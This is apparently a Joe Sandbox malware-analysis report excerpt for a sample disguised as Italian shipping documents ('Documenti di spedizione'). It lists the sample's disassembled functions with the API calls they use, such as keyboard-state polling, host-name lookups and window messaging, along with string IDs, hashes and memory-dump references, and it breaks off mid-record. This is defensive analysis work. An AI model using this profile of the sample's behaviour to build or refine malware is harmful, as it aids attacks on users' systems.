                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                        • String ID: 0
                        • API String ID: 956284711-4108050209
                        • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                        • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                        • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                        • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                        Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                        • String ID: 0.0.0.0
                        • API String ID: 1965227024-3771769585
                        • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                        • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                        • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                        • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                        Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: SendString$_memmove_wcslen
                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                        • API String ID: 369157077-1007645807
                        • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                        • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                        • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                        • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                        Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetParent.USER32 ref: 00445BF8
                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                        • __wcsicoll.LIBCMT ref: 00445C33
                        • __wcsicoll.LIBCMT ref: 00445C4F
                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __wcsicoll$ClassMessageNameParentSend
                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                        • API String ID: 3125838495-3381328864
                        • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                        • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                        • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                        • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                        Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                        • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                        • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                        • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                        • SendMessageW.USER32(?,00000402,?), ref: 00449399
                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSend$CharNext
                        • String ID:
                        • API String ID: 1350042424-0
                        • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                        • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                        • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                        • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                        Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                          • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                        • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                        • _wcscpy.LIBCMT ref: 004787E5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                        • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                        • API String ID: 3052893215-2127371420
                        • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                        • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                        • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                        • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                        Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                        Download Yara Rule
                        APIs
                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                        • __swprintf.LIBCMT ref: 0045E7F7
                        • _wprintf.LIBCMT ref: 0045E8B3
                        • _wprintf.LIBCMT ref: 0045E8D7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                        • API String ID: 2295938435-2354261254
                        • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                        • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                        • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                        • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                        Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __swprintf_wcscpy$__i64tow__itow
                        • String ID: %.15g$0x%p$False$True
                        • API String ID: 3038501623-2263619337
                        • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                        • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                        • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                        • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                        Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                        Download Yara Rule
                        APIs
                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                        • __swprintf.LIBCMT ref: 0045E5F6
                        • _wprintf.LIBCMT ref: 0045E6A3
                        • _wprintf.LIBCMT ref: 0045E6C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                        • API String ID: 2295938435-8599901
                        • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                        • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                        • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                        • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                        Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • timeGetTime.WINMM ref: 00443B67
                          • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                        • Sleep.KERNEL32(0000000A), ref: 00443B9F
                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                        • SetActiveWindow.USER32(00000000), ref: 00443BEC
                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                        • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                        • Sleep.KERNEL32(000000FA), ref: 00443C2D
                        • IsWindow.USER32(00000000), ref: 00443C3A
                        • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                        • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                        • String ID: BUTTON
                        • API String ID: 1834419854-3405671355
                        • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                        • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                        • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                        • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                        Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                        • LoadStringW.USER32(00000000), ref: 00454040
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • _wprintf.LIBCMT ref: 00454074
                        • __swprintf.LIBCMT ref: 004540A3
                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                        • API String ID: 455036304-4153970271
                        • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                        • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                        • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                        • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                        Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                        Download Yara Rule
                        APIs
                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                        • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                        • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                        • _memmove.LIBCMT ref: 00467EB8
                        • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                        • _memmove.LIBCMT ref: 00467F6C
                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                        • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                        • String ID:
                        • API String ID: 2170234536-0
                        • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                        • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                        • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                        • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                        Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?), ref: 00453CE0
                        • SetKeyboardState.USER32(?), ref: 00453D3B
                        • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                        • GetKeyState.USER32(000000A0), ref: 00453D75
                        • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                        • GetKeyState.USER32(000000A1), ref: 00453DB5
                        • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                        • GetKeyState.USER32(00000011), ref: 00453DEF
                        • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                        • GetKeyState.USER32(00000012), ref: 00453E26
                        • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                        • GetKeyState.USER32(0000005B), ref: 00453E5D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: State$Async$Keyboard
                        • String ID:
                        • API String ID: 541375521-0
                        • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                        • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                        • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                        • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                        Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                        Download Yara Rule
                        APIs
                        • GetDlgItem.USER32(?,00000001), ref: 004357DB
                        • GetWindowRect.USER32(00000000,?), ref: 004357ED
                        • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                        • GetDlgItem.USER32(?,00000002), ref: 0043586A
                        • GetWindowRect.USER32(00000000,?), ref: 0043587C
                        • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                        • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                        • GetWindowRect.USER32(00000000,?), ref: 004358EE
                        • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                        • GetDlgItem.USER32(?,000003EA), ref: 00435941
                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
